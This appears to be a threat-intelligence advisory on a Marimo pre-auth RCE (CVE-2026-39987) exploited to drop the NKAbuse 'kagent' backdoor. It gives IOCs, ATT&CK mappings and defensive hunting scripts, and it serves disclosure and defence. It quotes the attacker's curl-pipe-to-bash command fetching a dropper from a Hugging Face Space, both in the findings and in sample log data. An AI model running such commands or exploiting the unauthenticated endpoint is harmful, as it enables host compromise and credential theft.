
CVE-2026-39987: Marimo Pre-Auth RCE Weaponized to Drop NKAbuse Blockchain Backdoor From Hugging Face Spaces

Date: 2026-05-01
TLP: TLP:CLEAR
Tags: malicious-tool, malware

Executive Summary

CVE-2026-39987, a CVSS 9.3 unauthenticated remote code execution flaw in the Marimo Python notebook platform's /terminal/ws WebSocket endpoint, was disclosed on April 8, 2026 and exploited within 10 hours. Sysdig's Threat Research Team reported on April 16, 2026 that 11 unique source IPs from 10 countries generated 662 exploit events between April 11 and April 14, including a campaign that delivered an undocumented variant of the NKN-blockchain-based NKAbuse Go backdoor (kagent) hosted on the typosquatted Hugging Face Space vsccode-modetx. Defenders running Marimo must upgrade to 0.23.0 or later immediately, and hunt for kagent, ~/.kagent/, and outbound NKN protocol traffic on hosts that ran any vulnerable Marimo instance.

Campaign Summary

| Field | Detail |
| --- | --- |
| Campaign / Malware | NKAbuse "kagent" via Marimo CVE-2026-39987 |
| Attribution | Unattributed; opportunistic mass exploitation observed from 11 source IPs (confidence: none) |
| Target | Internet-exposed Marimo notebook deployments (data scientists, AI dev environments) |
| Vector | Pre-auth RCE on /terminal/ws WebSocket; payload staged from Hugging Face Spaces |
| Status | active (vulnerability patched in 0.23.0; exploitation ongoing) |
| First Observed | 2026-04-08 (disclosure); first observed exploitation 2026-04-08 (within ~10 hours) |

Detailed Findings

According to Resecurity, Positive Technologies, and Sysdig, CVE-2026-39987 affects all Marimo versions through and including 0.20.4. The /terminal/ws WebSocket endpoint exposes a full PTY shell without authentication validation, allowing an unauthenticated attacker on any network path to the Marimo server to spawn arbitrary commands as the Marimo process user. The flaw was disclosed on April 8, 2026; Sysdig and BleepingComputer report exploitation began within roughly 10 hours of disclosure.

According to Sysdig's Threat Research Team, between April 11 and April 14, 2026, 11 unique source IPs across 10 countries generated 662 distinct exploit events against honeypots and customer telemetry. The activity included reverse shells, credential extraction, DNS exfiltration, lateral movement to PostgreSQL and Redis using credentials harvested from the host, and deployment of a previously undocumented malware variant. SC Media corroborated the multi-actor pattern as "multiple attacks weaponizing critical Marimo RCE."

Sysdig reports the most distinctive sample was delivered from IP 38.147.173.172 (Hong Kong). The actor issued curl -fsSL https://vsccode-modetx.hf.space/install-linux.sh | bash, retried three times, and returned 20 minutes later to verify execution. The dropper URL points to a Hugging Face Space named vsccode-modetx, a deliberate typosquat of "VS Code." The Space hosts the dropper install-linux.sh (SHA-256 25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13) and a binary named kagent, mimicking the legitimate Kubernetes AI agent framework name. According to Sysdig, the dropper supports cross-platform installation, downloads the kagent binary, installs it locally, and sets up persistence via systemd unit, cron entry, or macOS LaunchAgent depending on the host.

According to Sysdig, GBHackers, and Cybersecurity News, kagent is a stripped, UPX-packed Go ELF that unpacks from approximately 4.3 MB to 15.5 MB and represents a previously undocumented variant of NKAbuse, a backdoor family that uses the NKN (New Kind of Network) decentralised blockchain protocol for command-and-control. NKN-based C2 sidesteps DNS- and IP-based block lists because traffic relays peer-to-peer over the NKN network rather than reaching a fixed C2 host.

According to BleepingComputer and Sysdig, separate exploit waves observed during the same window also conducted reverse shell campaigns, credential extraction (including cloud credentials and SSH keys), DNS exfiltration, and lateral movement using credentials looted from the Marimo host into adjacent PostgreSQL and Redis services. This multi-actor behaviour is consistent with mass exploitation rather than a single targeted operation.

Marimo addressed the vulnerability in release 0.23.0. The Hacker News, GBHackers, and Security Affairs all urge organisations to upgrade immediately, restrict Marimo to localhost or to authenticated reverse proxies, and audit hosts that exposed the /terminal/ws endpoint to the internet at any point since April 8, 2026.

MITRE ATT&CK Mapping

| Technique | ID | Context |
| --- | --- | --- |
| Exploit Public-Facing Application | T1190 | Pre-authentication RCE on /terminal/ws WebSocket of Marimo prior to 0.23.0 |
| Command and Scripting Interpreter: Unix Shell | T1059.004 | install-linux.sh dropper executed via curl pipe-to-bash |
| Ingress Tool Transfer | T1105 | Download of kagent and install-linux.sh from vsccode-modetx.hf.space Hugging Face Space |
| Resource Hijacking via Hosting Service | T1583.006 | Adversary-controlled Hugging Face Space used as staging infrastructure |
| Persistence: Systemd Service | T1543.002 | kagent installed as systemd user service on Linux hosts |
| Persistence: Scheduled Task/Job: Cron | T1053.003 | Cron entry created where systemd not available |
| Persistence: Launch Agent | T1543.001 | macOS LaunchAgent persistence path |
| Application Layer Protocol: Web Protocols | T1071.001 | HTTPS download of dropper and binary from .hf.space domain |
| Application Layer Protocol | T1071 | NKN blockchain protocol used for C2, evading IP/DNS reputation controls |
| Obfuscated Files or Information: Software Packing | T1027.002 | UPX-packed Go ELF binary |
| Credentials from Password Stores | T1555 | Harvest of credentials from Marimo host filesystem and environment |
| Lateral Movement: Remote Services | T1021 | Use of stolen credentials against adjacent PostgreSQL and Redis services |

IOCs

Domains

vsccode-modetx.hf.space

Full URL Paths

vsccode-modetx.hf.space/install-linux.sh

Splunk Format

"vsccode-modetx.hf.space" OR "vsccode-modetx.hf.space/install-linux.sh" OR "38.147.173.172" OR "kagent.service" OR ".kagent/"

File Hashes

25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13

IP Indicators

38.147.173.172

Package Indicators

The campaign abuses a Hugging Face Space rather than a package registry; no PyPI or npm IOCs apply. The vulnerable software is the Marimo Python notebook (versions ≤ 0.20.4); upgrade to 0.23.0 or later.

Detection Recommendations

Web proxy and EDR: alert on any host that fetched https://vsccode-modetx.hf.space/install-linux.sh or any other resource from vsccode-modetx.hf.space. Treat such hosts as compromised.

Network: monitor for outbound connections matching NKN protocol traffic patterns from servers and developer workstations, particularly from any host that ran Marimo. NKN traffic typically uses peer-to-peer relay to NKN nodes; alert on persistent outbound flows from non-Web/cloud workloads to mixed-IP NKN relay endpoints.

Host hunting: search for the directory ~/.kagent/, the systemd unit kagent.service, the binary name kagent in user bin/ and home directories, cron entries referencing kagent, and macOS LaunchAgents plists for kagent. Confirm against legitimate kagent (Kubernetes AI agent framework) installations before remediating.
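
The host hunt above as a read-only triage script. This is an added example, not code from the advisory or from Sysdig. It assumes the dropper uses the standard systemd, cron and LaunchAgent locations (the page names only ~/.kagent/, kagent.service and kagent), and it uses the UPX marker to separate the packed sample from a legitimate kagent binary as a heuristic only.

```python
from pathlib import Path

# Standard OS persistence locations. That the dropper writes to exactly these
# is an assumption; the page names only ~/.kagent/, kagent.service and kagent.
SYSTEM_UNIT_DIRS = ("etc/systemd/system", "usr/lib/systemd/system")
CRON_DIRS = ("etc/cron.d", "var/spool/cron", "var/spool/cron/crontabs")


def _ls(directory, pattern):
    """Glob a directory, tolerating one that does not exist."""
    return sorted(directory.glob(pattern)) if directory.is_dir() else []


def _read(path):
    try:
        return path.read_bytes()
    except OSError:
        return b""


def _is_upx_elf(path):
    """ELF carrying the UPX! marker: matches the packed sample, heuristic only."""
    data = _read(path)
    return data[:4] == b"\x7fELF" and b"UPX!" in data


def hunt(root="/"):
    """Return sorted (kind, path) findings for triage; nothing is modified."""
    root, hits = Path(root), set()
    homes = [root / "root"] + _ls(root / "home", "*") + _ls(root / "Users", "*")
    for home in (h for h in homes if h.is_dir()):
        if (home / ".kagent").is_dir():
            hits.add(("dir", home / ".kagent"))
        for unit in _ls(home / ".config/systemd/user", "kagent*.service"):
            hits.add(("unit", unit))
        for plist in _ls(home / "Library/LaunchAgents", "*.plist"):
            if b"kagent" in _read(plist):
                hits.add(("launchagent", plist))
        for d in (home, home / "bin", home / ".local/bin", home / ".kagent"):
            if (d / "kagent").is_file():
                kind = "binary-upx" if _is_upx_elf(d / "kagent") else "binary"
                hits.add((kind, d / "kagent"))
    for d in SYSTEM_UNIT_DIRS:
        hits.update(("unit", u) for u in _ls(root / d, "kagent*.service"))
    cron_files = [root / "etc/crontab"] + [f for d in CRON_DIRS for f in _ls(root / d, "*")]
    hits.update(("cron", f) for f in cron_files if f.is_file() and b"kagent" in _read(f))
    return sorted((kind, str(path)) for kind, path in hits)
```

Call hunt("/") on a live host, or pass the mount point of a forensic image. A plain "binary" finding without the UPX marker is the case to check against a legitimate kagent installation before remediating.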

Marimo hardening: audit the Marimo version on every host running the notebook server. Block external access to /terminal/ws, place Marimo behind authenticated reverse proxies, and upgrade to 0.23.0 or later. Inspect Marimo process accounting and audit logs for unexpected curl, bash, python, sh invocations between April 8 and the time of patch.
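
The process-audit step above, sketched as lineage detection over exec events (an added example, not from the advisory). The event field names are hypothetical, the sample records are constructed, and the Marimo server is assumed to appear under the process name "marimo". The walk up the parent chain matters because the PTY shell sits between Marimo and the curl and bash processes it launches.

```python
import json
from datetime import datetime, timezone

WINDOW_START = datetime(2026, 4, 8, tzinfo=timezone.utc)  # disclosure date
SUSPECT = {"curl", "bash", "sh", "python"}                 # names listed above
IOCS = ("vsccode-modetx.hf.space", "38.147.173.172", "kagent")

# Constructed process-exec events. Field names are hypothetical: map them from
# auditd, eBPF or EDR telemetry. PIDs are assumed unique within the sample.
SAMPLE = """
{"ts":"2026-04-12T03:09:00+00:00","pid":900,"ppid":1,"exe":"marimo","cmd":"marimo edit nb.py"}
{"ts":"2026-04-12T03:10:00+00:00","pid":910,"ppid":900,"exe":"sh","cmd":"sh"}
{"ts":"2026-04-12T03:10:05+00:00","pid":911,"ppid":910,"exe":"curl","cmd":"curl -fsSL https://vsccode-modetx.hf.space/install-linux.sh"}
{"ts":"2026-04-12T03:10:05+00:00","pid":912,"ppid":910,"exe":"bash","cmd":"bash"}
{"ts":"2026-04-12T04:00:00+00:00","pid":950,"ppid":700,"exe":"curl","cmd":"curl https://example.org/health"}
{"ts":"2026-04-20T09:00:00+00:00","pid":990,"ppid":900,"exe":"sh","cmd":"sh"}
"""


def flag_marimo_children(lines, patched_at):
    """Return (pid, exe, verdict) for suspect processes descended from marimo."""
    events = [json.loads(line) for line in lines.splitlines() if line.strip()]
    by_pid = {e["pid"]: e for e in events}

    def under_marimo(event):
        seen = set()
        while event and event["pid"] not in seen:  # guard against ppid loops
            seen.add(event["pid"])
            event = by_pid.get(event["ppid"])
            if event and event["exe"] == "marimo":
                return True
        return False

    flagged = []
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        if WINDOW_START <= ts <= patched_at and e["exe"] in SUSPECT and under_marimo(e):
            verdict = "ioc" if any(i in e["cmd"] for i in IOCS) else "review"
            flagged.append((e["pid"], e["exe"], verdict))
    return flagged
```

A "review" verdict is not proof of compromise, since authenticated users can also open a terminal; correlate it with the source address of the /terminal/ws connection where that is logged.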

Database lateral movement: review PostgreSQL and Redis audit logs and authentication histories for the period since April 8, 2026, prioritising credentials that were ever stored on a Marimo host filesystem or environment.

Hugging Face hygiene: track which Hugging Face Spaces and Models are reachable from data-science workstations, and apply egress filtering or proxy logging to *.hf.space to support post-compromise hunting.

References